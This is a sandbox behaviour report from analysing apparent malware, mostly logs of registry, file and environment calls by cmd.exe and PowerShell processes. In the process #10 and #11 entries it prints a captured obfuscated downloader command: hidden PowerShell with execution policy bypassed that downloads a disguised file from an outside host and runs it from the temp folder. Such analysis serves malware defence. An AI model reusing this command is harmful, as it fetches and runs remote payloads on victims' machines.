Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0x78c

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #10: cmd.exe

62

0

»

Information	Value
ID	#10
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:54, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:31

OS Process Information

»

Information	Value
PID	0x838
Parent PID	0x41c (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 840

Threads

Thread 0x840

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:45:57 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 125549	1	Fn
System	Get Time	type = Performance Ctr, time = 17955408596	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x964, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #11: powershell.exe

340

0

»

Information	Value
ID	#11
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:55, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:30

OS Process Information

»

Information	Value
PID	0x964
Parent PID	0x838 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 968 0x 9DC 0x 708 0x 9E8 0x 24C 0x 76C 0x 484

Threads

Thread 0x968

305

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	15	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
